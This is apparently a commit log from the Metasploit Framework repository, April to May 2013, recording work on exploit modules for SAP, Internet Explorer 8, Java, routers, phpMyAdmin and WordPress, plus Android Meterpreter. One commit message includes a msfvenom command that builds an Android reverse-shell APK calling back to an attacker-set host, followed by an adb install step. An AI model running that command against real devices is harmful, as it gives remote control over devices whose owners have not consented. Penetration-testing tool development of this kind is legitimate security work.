24bad9c15c
Clean up sap_soap_rfc_sxpg_call_system_exec and make it multi platform
2013-05-07 17:03:10 -05:00
jvazquez-r7
76f6d9f130
Move module to multi-platform location
2013-05-07 17:01:56 -05:00
Rob Fuller
71c68d09c1
Allow user ability to set filename for psexec service binary
...
This should probably be higher up for all
generate_payload_exe but would take a major edit
2013-05-07 15:26:22 -03:00
m-1-k-3
e3582887cf
OSVDB, Base64
2013-05-07 08:28:48 +02:00
jvazquez-r7
a1d2680a17
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-05-06 23:24:21 -05:00
jvazquez-r7
bcdad23559
up to date
2013-05-06 23:09:32 -05:00
jvazquez-r7
0fa65a6802
Merge branch 'sap_soap_rfc_sxpg_command_exec' of https://github.com/nmonkee/metasploit-framework
2013-05-06 18:50:31 -05:00
jvazquez-r7
fff8593795
Fix author name
2013-05-06 17:34:37 -05:00
jvazquez-r7
ad21a107ec
up to date
2013-05-06 15:48:59 -05:00
jvazquez-r7
fcb9dc1384
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-05-06 15:40:22 -05:00
jvazquez-r7
c84febb81a
Fix extra character
2013-05-06 15:19:15 -05:00
jvazquez-r7
92b4d23c09
Add Mariano as Author because of the abuse disclosure
2013-05-06 15:15:15 -05:00
jvazquez-r7
db243e78c8
Land #1682 , sap_router_info_request fix from @nmonkee
2013-05-06 15:13:57 -05:00
jvazquez-r7
85581a0b6f
Clean up sap_soap_rfc_eps_get_directory_listing
2013-05-06 13:21:42 -05:00
jvazquez-r7
1fc0bfa165
Change module filename
2013-05-06 13:20:07 -05:00
m-1-k-3
09bf23f4d6
linksys wrt160n tftp download module
2013-05-06 16:18:15 +02:00
m-1-k-3
22d850533a
dir615 down and exec exploit
2013-05-06 15:33:45 +02:00
m-1-k-3
0f2a3fc2d4
dsl320b authentication bypass - password extract
2013-05-06 14:31:47 +02:00
jvazquez-r7
7b960a4f18
Add OSVDB reference
2013-05-06 00:54:00 -05:00
jvazquez-r7
a17062405d
Clean up for sap_soap_rfc_eps_delete_file
2013-05-06 00:53:07 -05:00
jvazquez-r7
5adc2879bf
Change module filename
2013-05-06 00:51:23 -05:00
jvazquez-r7
66a5eb74c5
Move file to auxiliary/dos/sap
2013-05-06 00:50:50 -05:00
jvazquez-r7
425a16c511
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-05-05 22:00:07 -05:00
David Maloney
e40695769d
unbotch merge?
2013-05-05 16:43:56 -05:00
David Maloney
2d99167fe7
Merge commit 'b0f5255de8f78fb0d54be1ee49f43455968d6740' into upstream-master
2013-05-05 16:41:18 -05:00
David Maloney
b0f5255de8
fix ssh_creds username
...
ssh_creds post module as not saving
the username in the cred objects
2013-05-05 16:31:28 -05:00
Tod Beardsley
8239998ada
Typo on URL for #1797 . Thx @Meatballs1
2013-05-05 12:26:06 -05:00
Tod Beardsley
c9ea7e250e
Fix disclosure date, ref for #1897
2013-05-05 12:13:02 -05:00
Tod Beardsley
e9841b216c
Land #1797 , IE8 DoL exploit module from @wchen-r7
...
Exploit for an in-the-wild unpatched vuln in IE8. @jvazquez-r7 already
reviewed functionality
2013-05-05 12:06:45 -05:00
sinn3r
a33510e821
Add MS IE8 DoL 0day exploit (CVE-2013-1347)
...
This module exploits a use-after-free vuln in IE 8, used in the
Department of Labor attack.
2013-05-05 12:04:17 -05:00
HD Moore
63b0eace32
Add a missing require
2013-05-04 22:39:57 -05:00
jvazquez-r7
2384f34ada
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-05-03 15:39:16 -05:00
m-1-k-3
c3e9503c0b
tplink traversal - initial commit
2013-05-03 14:27:13 -05:00
jvazquez-r7
589be270bf
Land #1658 , @nmonkee's SAP module for PFL_CHECK_OS_FILE_EXISTENCE
2013-05-03 14:19:36 -05:00
jvazquez-r7
13202a3273
Add OSVDB reference
2013-05-03 09:46:29 -05:00
jvazquez-r7
a95de101e7
Delete extra line
2013-05-02 22:04:27 -05:00
jvazquez-r7
6210b42912
Port EDB 25141 to msf
2013-05-02 22:00:43 -05:00
jvazquez-r7
796f7a39ac
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-05-02 20:04:48 -05:00
jvazquez-r7
a2e1fbe7a9
Make msftidy happy
2013-05-02 19:46:26 -05:00
jvazquez-r7
f57b2de632
Land #1787 , @wchen-r7's mod to ie_cbutton_uaf to use the js_mstime_malloc API
2013-05-02 19:44:19 -05:00
jvazquez-r7
9e1037bce0
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-05-02 16:15:28 -05:00
jvazquez-r7
b096449a97
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-05-02 15:12:19 -05:00
Tod Beardsley
7579b574cb
Rework parse_xml
...
We try to avoid using Nokogiri in modules due to the sometimes
uncomfortable dependencies it creates with particular compiled libxml
versions. Also, the previous parse_xml doesn't seem to be correctly
skipping item entries with blank names.
I will paste the test XML in the PR proper, but do check against a live
target to make sure I'm not screwing it up.
2013-05-02 14:43:30 -05:00
Tod Beardsley
902cd7ec85
Revert removal of the SAP module
...
This reverts commit 26da7a6ee7
.
2013-05-02 14:42:35 -05:00
sinn3r
eb23b5feeb
Forgot to remove function ie8_smil. Don't need this anymore.
2013-05-02 14:04:15 -05:00
sinn3r
329e8228d1
Uses js_mstime_malloc to do the no-spray technique
2013-05-02 14:00:15 -05:00
Tod Beardsley
26da7a6ee7
Removing this from master due to test problems
...
This module was moved over to the unstable branch in commit
7106afdf7d
, working up a fix now. Stay
tuned.
2013-05-02 13:43:02 -05:00
jvazquez-r7
132c09af82
Add BID reference
2013-05-02 10:21:09 -05:00
jvazquez-r7
6e68f3cf34
Clean up sap_soap_rfc_pfl_check_os_file_existence
2013-05-02 10:19:15 -05:00
jvazquez-r7
244bf71d4a
Change module filename
2013-05-02 10:15:50 -05:00
jvazquez-r7
29d4e378aa
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-05-02 09:27:51 -05:00
jvazquez-r7
d9cdb6a138
Fix more feedback provided by @nmonkee: CMD vs COMMAND
2013-05-02 09:08:48 -05:00
jvazquez-r7
c6c7998e3b
Fix feedback provided by @nmonkee
2013-05-02 09:06:51 -05:00
jvazquez-r7
4db81923bf
Update description
2013-05-02 08:45:01 -05:00
jvazquez-r7
4054d91955
Land #1657 , @nmonkee's RZL_READ_DIR_LOCAL SAP dir listing module
2013-05-02 08:38:50 -05:00
jvazquez-r7
e25057b64a
Fix indent level
2013-05-01 22:01:36 -05:00
jvazquez-r7
c406271921
Cleanup sap_soap_rfc_rzl_read_dir
2013-05-01 21:51:06 -05:00
jvazquez-r7
98dd96c57d
Change module filename
2013-05-01 21:50:24 -05:00
jvazquez-r7
6b6b53240b
Fix SAP modules, mainly to make a better use of send_request_cgi
2013-05-01 14:06:53 -05:00
jvazquez-r7
ec34544299
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-05-01 11:47:36 -05:00
Michael Schierl
a13cf53b9f
Android Meterpreter bugfixes
...
- classes.dex gets mangled on windows; use binary mode when reading it
- UnknownHostExceptions on API Level 3 emulator because of trailing
whitespace after the hostname/IP
- Work around integer overflow at year 2038 when signing the payload
2013-05-01 18:01:37 +02:00
jvazquez-r7
567d2bb14b
Land #1687 , @bmerinofe's forensic file recovery post module
2013-05-01 08:13:08 -05:00
jvazquez-r7
a201391ee6
Clean recovery_files
2013-04-30 13:18:32 -05:00
Gregory Man
76e70adcff
Added Memcached Remote Denial of Service module
...
https://code.google.com/p/memcached/issues/detail?id=192
2013-04-30 17:45:09 +03:00
jvazquez-r7
a7e4ba5015
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-04-30 08:32:24 -05:00
Tod Beardsley
60e0cfb17b
Trivial description cleanup
2013-04-29 14:11:20 -05:00
Tod Beardsley
4227c23133
Add a reference for Safari module
2013-04-29 14:07:55 -05:00
Joe Vennix
431cba8f36
Update print_status labels.
2013-04-29 11:13:53 -05:00
Joe Vennix
c2a1d296a2
Rename DOWNLOAD_URI -> DOWNLOAD_PATH.
...
Conflicts:
modules/auxiliary/gather/apple_safari_webarchive_uxss.rb
2013-04-29 11:11:06 -05:00
Joe Vennix
55e0ec3187
Add support for DOWNLOAD_URI option.
...
* Fixes some comments that were no longer accurate.
Conflicts:
modules/auxiliary/gather/apple_safari_webarchive_uxss.rb
2013-04-29 11:10:19 -05:00
jvazquez-r7
a4632b773a
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-04-28 12:59:16 -05:00
sinn3r
1d9a695d2b
Landing #1772 - Adds phpMyadmin Preg_Replace module (CVE-2013-3238)
...
[Closes #1772 ]
2013-04-28 12:17:16 -05:00
Meatballs
ccb630eca2
Whitespace and change default user
2013-04-27 10:39:27 +01:00
Meatballs
209188bc22
Add refs and use targeturi
2013-04-27 10:35:49 +01:00
Meatballs
3ac041386b
Add php version to check
2013-04-26 23:59:49 +01:00
Meatballs
e25fdebd8d
Add php version to check
2013-04-26 23:58:08 +01:00
Meatballs
cd842df3e2
Correct phpMyAdmin
2013-04-26 23:38:27 +01:00
Meatballs
6bb2af7cee
Add pma url
2013-04-26 23:37:26 +01:00
sinn3r
6821c360b6
Landing #1761 - Adds Wordpress Total Cache module
...
[Closes #1761 ]
2013-04-26 16:08:04 -05:00
sinn3r
6c76bee02f
Trying to make the description sound smoother
2013-04-26 16:02:28 -05:00
James Lee
9c8b93f1b7
Make sure LPORT is a string when subbing
...
* Gets rid of conversion errors like this:
[-] Exploit failed: can't convert Fixnum into String
* also removes comments from php meterp. Works for me with the
phpmyadmin_preg_replace bug, so seems legit.
2013-04-26 15:26:31 -05:00
James Lee
a0c1b6d1ce
Clear out PMA's error handler
...
* Add an error_handler function that just returns true. This prevents eventual
ENOMEM errors and segfaults like these:
[Fri Apr 26 15:01:00 2013] [error] [client 127.0.0.1] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 44659282 bytes) in /home/egypt/repo/phpmyadmin/libraries/Error.class.php on line 156
[Fri Apr 26 15:01:16 2013] [notice] child pid 7347 exit signal Segmentation fault (11)
* clean up some whitespace
2013-04-26 15:25:09 -05:00
Meatballs
1f2cab7aef
Tidyup and getcookies
2013-04-26 20:26:04 +01:00
Meatballs
0901d00da5
Remove redundant pay opts
2013-04-26 19:26:29 +01:00
Meatballs
a17d61897d
Change to send_rq_cgi
2013-04-26 19:19:11 +01:00
Tod Beardsley
bf6b1b4fbf
Land #1773 , fixes for Safari UXSS
...
Makes the module more user-friendly, doesn't barf on malformed paths for
keystroke logger catching.
2013-04-26 13:11:55 -05:00
Tod Beardsley
c27245e092
Touch descriptions for module and options
2013-04-26 13:05:16 -05:00
Joe Vennix
b4606ba60a
Remove unnecessary puts call.
2013-04-26 12:55:02 -05:00
Tod Beardsley
ca6d6fbc84
msftidy for whitespace
2013-04-26 12:44:11 -05:00
Tod Beardsley
16769a9260
Fixing path normalization
2013-04-26 12:40:24 -05:00
Meatballs
54233e9fba
Better entropy
2013-04-26 17:46:43 +01:00
Meatballs
c8da13cfa0
Add some entropy in request
2013-04-26 17:34:17 +01:00
Joe Vennix
2fa16f4d36
Rewrite relative script URLs to be absolute.
...
* Adds rescue clauses around URI parsing/pulling
* Actually use the URI_PATH datastore option.
2013-04-26 11:25:20 -05:00
Meatballs
a043d3b456
Fix auth check and cookie handling
2013-04-26 17:10:24 +01:00
Meatballs
025315e4e4
Move to http
2013-04-26 15:42:26 +01:00
Meatballs
9ad19ed2bf
Final tidyup
2013-04-26 15:41:28 +01:00
jvazquez-r7
99b46202b9
Do final cleanup for sap_configservlet_exec_noauth
2013-04-26 08:45:34 -05:00
jvazquez-r7
308b880d79
Land #1759 , @andrewkabai's exploit for SAP Portal Command Execution
2013-04-26 08:44:11 -05:00
Meatballs
c7ac647e4e
Initial attempt lfi
2013-04-26 14:32:18 +01:00
Andras Kabai
5839e7bb16
simplify code
2013-04-26 12:14:42 +02:00
Andras Kabai
4aadd9363d
improve description
2013-04-26 12:13:45 +02:00
jvazquez-r7
2a41422276
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-04-25 20:24:17 -05:00
sinn3r
f3f60f3e02
Fixes P/P/R for target 0 (BadBlue 2.72b)
...
Target 1, which covers 2.72b, uses an invalid P/P/R from some unknown
DLL, and appears to be broken. Because 2.72b actually uses the same
ext.dll as BadBlue EE 2.7 (and that target 0 actually also works
against 2.72b), we might as well just use the same P/P/R again.
[FixRM #7875 ]
2013-04-25 20:20:24 -05:00
jvazquez-r7
bf0375f0e9
Fix @jlee-r7's feedback
2013-04-25 18:43:21 -05:00
jvazquez-r7
8eea476cb8
Build the jnlp uri when resource is available
2013-04-25 18:43:21 -05:00
jvazquez-r7
cc961977a2
Add bypass for click2play
2013-04-25 18:43:21 -05:00
jvazquez-r7
9b5e96b66f
Fix @jlee-r7's feedback
2013-04-25 14:53:09 -05:00
jvazquez-r7
52b721c334
Update description
2013-04-25 14:47:35 -05:00
jvazquez-r7
84e9f80ffa
Add check for WP-Super-Cache
2013-04-25 14:43:16 -05:00
James Lee
6767eee08a
Add in-line signing
...
Signing the generated APK in the module means users don't have to have
keytool or jarsigner to create a working package.
Example usage:
./msfvenom -p android/meterpreter/reverse_tcp \
LHOST=192.168.99.1 LPORT=2222 -f raw > meterp.apk
adb install ./meterp.apk
2013-04-25 13:57:54 -05:00
Andras Kabai
9dd9b2d1ba
implement cleanup functionality
...
register DELETE_FILES advanced option to take control of the cleanup
functionality of CmdStagerVBS and FileDropper, implement the necessary
changes
2013-04-25 20:02:24 +02:00
jvazquez-r7
15c8d92148
Fix version checked and add reference
2013-04-25 12:48:36 -05:00
Andras Kabai
a28ef1847b
update references
2013-04-25 18:26:13 +02:00
Joe Vennix
993356c73e
Add safari webarchive uxss to framework as an aux module.
2013-04-25 11:14:16 -05:00
jvazquez-r7
7bf4aa317f
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-04-25 10:31:51 -05:00
jvazquez-r7
b67fcd3219
Add OSVDB ref to sap_configservlet_exec_noauth
2013-04-25 08:13:32 -05:00
jvazquez-r7
7d317e5933
Switch from post to get on check
2013-04-25 07:51:28 -05:00
jvazquez-r7
d55faa14d3
Add check function
2013-04-25 07:44:37 -05:00
Andras Kabai
676f2f5f4a
implement "check" functionality
2013-04-25 07:47:30 +02:00
Andras Kabai
3b46d5d4cd
fix typos
2013-04-25 07:22:16 +02:00
Andras Kabai
2759ef073e
correction on error handling
2013-04-25 07:19:27 +02:00
Andras Kabai
6b14ac5e71
add rank to module
2013-04-25 07:07:35 +02:00
jvazquez-r7
51fd07a145
Add BID reference
2013-04-24 21:48:05 -05:00
jvazquez-r7
378c2079a2
Add hdm also as author
2013-04-24 17:37:29 -05:00
jvazquez-r7
b816dd569c
Update description
2013-04-24 17:34:25 -05:00
jvazquez-r7
573e880a62
Use the correct post id when posting
2013-04-24 17:30:24 -05:00
jvazquez-r7
ded0269ba0
Add POST ID bruteforcing capabality
2013-04-24 17:21:36 -05:00
jvazquez-r7
fca4c3b8b2
Add sha1 sum check to allow execution
2013-04-24 16:10:49 -05:00
jvazquez-r7
d2e29b846c
Add module for Wordpress Total Cache PHP Injection
2013-04-24 15:29:40 -05:00
Andras Kabai
f22d19a10c
remove unused code block
...
ARCH_CMD was implemented in previous version of this code.
2013-04-24 21:51:35 +02:00
jvazquez-r7
38e41f20fe
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-04-24 13:24:13 -05:00
Andras Kabai
0339be229a
implement dynamic timeout handling
2013-04-24 18:22:37 +02:00
Andras Kabai
6f8fc81497
improve error handling
2013-04-24 17:59:11 +02:00
jvazquez-r7
2b4144f20f
Add module for US-CERT-VU 345260
2013-04-24 10:47:16 -05:00
Andras Kabai
57113bee80
fine correction
...
add license
remove one unnecessary tab to make msftidy happy
2013-04-24 15:07:32 +02:00
Andras Kabai
6485124cdf
fix module name
2013-04-24 10:54:52 +02:00
Andras Kabai
358b8934bf
clarify description
2013-04-24 10:31:40 +02:00
Andras Kabai
00e6eeca54
implement command line magick to prevent bad char usage
...
commas in the HTTP queries are not allowed but the VBS stager contains
some, therefore it was necessary to find a way to echo out commas
without directly use them.
thanks to Laszlo Toth to help me figure out this windows command line
trick.
2013-04-24 09:46:36 +02:00
Andras Kabai
783cca6c17
allow only ARCH_X86 payloads
2013-04-24 09:29:47 +02:00
sinn3r
cae30bec23
Clean up all the whitespace found
2013-04-23 18:27:11 -05:00
jvazquez-r7
1761b1ad7b
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-04-23 17:35:35 -05:00
jvazquez-r7
ece36c0610
Update references for the las Java exploit
2013-04-22 21:55:04 -05:00
jvazquez-r7
96b66d3856
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-04-22 21:49:59 -05:00
jvazquez-r7
1529dff3f3
Do final cleanup for sap_configservlet_exec_noauth
2013-04-22 21:43:41 -05:00
jvazquez-r7
8c9715c2ed
Land #1751 , @andrewkabai's SAP Portal remote OS command exec
2013-04-22 21:41:53 -05:00
jvazquez-r7
5f5e772f7c
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-04-22 21:31:16 -05:00
sinn3r
a09b3b8023
Lands #1169 - Adds a check
...
[Closes #1169 ]
Conflicts:
modules/auxiliary/dos/http/apache_range_dos.rb
2013-04-22 15:50:15 -05:00
sinn3r
882b084cba
Changes the default action
2013-04-22 15:47:38 -05:00
sinn3r
7e28a4ddb0
Uses "ACTIONS" keys instead of datastore options
...
It's better to use ACTIONS instead of datastore in this case. Also,
did some cleanup.
2013-04-22 15:41:47 -05:00
sinn3r
dfff20a3fc
Landing #1692 - Handles OSQL banners and responses
...
[Close #1692 ]
2013-04-22 13:58:44 -05:00
Andras Kabai
79eb2ff62d
add EDB ID to references
2013-04-22 18:37:28 +02:00
Andras Kabai
15b06c43aa
sap_configservlet_exec_noauth auxiliary module
...
the final module was moved from my master branch to here because of the
pull request needs
2013-04-22 17:40:27 +02:00
Andras Kabai
b4f1f3efbb
remove aux module from master branch
2013-04-22 17:34:01 +02:00
Andras Kabai
750638e4d6
note on bad characters
2013-04-22 17:24:08 +02:00
jvazquez-r7
b6365db0b5
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-04-22 09:38:32 -05:00
Andras Kabai
a1e52b5b27
command execution needs cmd /c
2013-04-22 10:20:45 +02:00
Antoine
0115833724
SyntaxError fixes
2013-04-21 20:22:41 +00:00
Andras Kabai
d26289e05a
proper output handling in case of CMD payloads
2013-04-20 17:38:58 +02:00
Andras Kabai
d59ba37e6d
resize linemax
2013-04-20 17:37:50 +02:00
Andras Kabai
e36b58169b
implement CmbStagerVBS payload execution
2013-04-20 16:37:47 +02:00
Andras Kabai
8244c4dcac
multiple payload types, different paths to execute payloads
2013-04-20 14:20:30 +02:00
Andras Kabai
7b6a784a84
basic payload execution through OS command execution
2013-04-20 13:02:22 +02:00
Andras Kabai
223556a4e6
switch to exploit module environment
...
switch to Msf::Exploit, change the necessary declarations, start to
change the exploitation process
2013-04-20 12:30:44 +02:00
Andras Kabai
cff47771a2
initial commit
...
the original aux module will be the base of the exploit module
2013-04-20 11:32:05 +02:00
jvazquez-r7
1365dfe68c
Add Oracle url
2013-04-20 01:43:14 -05:00
jvazquez-r7
b99fc06b6f
description updated
2013-04-20 01:43:14 -05:00
jvazquez-r7
19f2e72dbb
Added module for Java 7u17 sandboxy bypass
2013-04-20 01:43:13 -05:00
jvazquez-r7
d1c5179b83
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-04-19 17:48:12 -05:00
Andras Kabai
49b055e5fd
make msftidy happy
2013-04-20 00:26:04 +02:00
Andras Kabai
e4d9c45ce9
remove unnecessary rank rating
2013-04-20 00:23:55 +02:00
jvazquez-r7
c7fcd6931a
Use vprint_error
2013-04-19 16:22:07 -05:00
jvazquez-r7
4ef33197dc
Land #1745 - @FireFart's improvement for MediaWiki aux module
2013-04-19 16:20:33 -05:00
jvazquez-r7
ffb71ff61b
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-04-19 16:03:55 -05:00
jvazquez-r7
19a158dce9
Do final cleanup for netgear_dgn2200b_pppoe_exec
2013-04-19 15:50:23 -05:00
jvazquez-r7
c1819e6ecc
Land #1700 , @m-1-k-3's exploit for Netgear DGN2200B
2013-04-19 15:49:30 -05:00
Christian Mehlmauer
eaff87879e
added text
2013-04-19 22:03:05 +02:00
Christian Mehlmauer
a6be72b019
fixes for mediawiki aux module
2013-04-19 21:43:12 +02:00
Andras Kabai
763d1ac2f1
remove unnecessary option declaration
2013-04-19 21:42:28 +02:00
Andras Kabai
85932a2445
improve URI path and parameter handling
...
switch from PATH to TARGETURI datastore;
use normalize_uri to build uri;
use query in send_request_cgi to to prepare query string (instead of
vars_get that escapes the necessary semicolons)
2013-04-19 21:37:39 +02:00
jvazquez-r7
d4fa2ba96d
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-04-19 14:14:36 -05:00
Andras Kabai
c52588f579
remove Scanner mixin
...
remove Scanner mixin because this module is not a scanner modul
2013-04-19 20:28:44 +02:00
sinn3r
7fdf84ac45
Landing #1744 - Checks nil before using resp.headers['Server']
...
[Closes #1744 ]
2013-04-19 10:37:05 -05:00
jvazquez-r7
31586770a0
Added module for OSVDB 92490
2013-04-18 14:34:02 -05:00
Andras Kabai
8f76c436d6
SAP ConfigServlet OS Command Execution module
...
This module allows execution of operating system commands throug the
SAP ConfigServlet without any authentication.
2013-04-18 20:26:48 +02:00
RageLtMan
15c6df1482
Check for nil before calling on value
2013-04-18 00:32:37 -04:00
m-1-k-3
2713991c64
timeout and HTTP_Delay
2013-04-17 20:25:59 +02:00
jvazquez-r7
bbf7cc4394
up to date
2013-04-17 11:54:12 -05:00
m-1-k-3
59045f97fb
more testing, reworking of config restore, rework of execution
2013-04-17 18:10:27 +02:00
jvazquez-r7
48def7dbdb
up to date
2013-04-17 06:36:44 -05:00
jvazquez-r7
088eb8618d
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-04-16 21:11:55 -05:00
Jon Hart
83ec9757ec
Addressed feedback from PR#1717
2013-04-16 19:00:26 -07:00
jvazquez-r7
4e8d32a89a
cleanup for freefloatftp_user
2013-04-16 20:43:38 -05:00
jvazquez-r7
eedeb37047
Landing #1731 , @dougsko's freefloat ftp server bof exploit
2013-04-16 20:42:01 -05:00
jvazquez-r7
cc35591723
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-04-15 17:43:15 -05:00
root
830715dc07
Applying changes
2013-04-16 00:28:39 +02:00
Tod Beardsley
a36c6d2434
Lands #1730 , adds a VERBOSE option checker
...
Also removes VERBOSE options from extant modules. There were only 5 of
them, and one was a commented option.
2013-04-15 15:32:56 -05:00
Tod Beardsley
29101bad41
Removing VERBOSE offenders
2013-04-15 15:29:56 -05:00
Tod Beardsley
be39079830
Trailing whitespace fix
...
Note that this commit needed a --no-verify because of the erroneous
check in msftidy for writing to stdout. The particular syntax of this
payload makes it look like we're doing that when we're really not.
So don't sweat it.
2013-04-15 13:58:06 -05:00
Tod Beardsley
efdf4e3983
Lands #1485 , fixes for Windows-based Ruby targets
2013-04-15 13:56:41 -05:00
Tod Beardsley
873bdbab57
Removing APSB13-03, not ready.
...
This was landed by @todb-r7 on #1709 but that was premature. #1717 was
a proposed set of fixes, but it didn't go far enough.
@jhart-r7 and @jvazquez-r7 should revisit this module for sure, there's
some good stuff in there, but it's not ready for a real release quite
yet. Take a look at the issues discussed in those PRs and open a new PR
with a new module?
Sorry for the switcheroo, not trying to be a jerk.
[Closes #1717 ]
2013-04-15 13:36:47 -05:00
Tod Beardsley
513b3b1455
Minor cleanup on DLink module
2013-04-15 13:27:47 -05:00
timwr
df9c5f4a80
remove unused resources and fix whitespace
2013-04-13 16:22:52 +01:00
timwr
32bd812bdb
android meterpreter
2013-04-12 18:57:04 +01:00
jvazquez-r7
9c0862ad7b
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-04-11 21:53:07 +02:00
jvazquez-r7
7e5d4bc893
Landing #1614 , @jwpari nagios nrpe exploit
2013-04-11 17:53:52 +02:00
James Lee
e3eef76372
Land #1223
...
This adds rc4-encrypting stagers for Windows.
[Closes #1223 ]
2013-04-10 12:14:52 -05:00
James Lee
6c980981db
Break up long lines and add magic encoding comment
2013-04-10 09:28:45 -05:00
jvazquez-r7
4959e03864
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-04-10 11:29:37 +02:00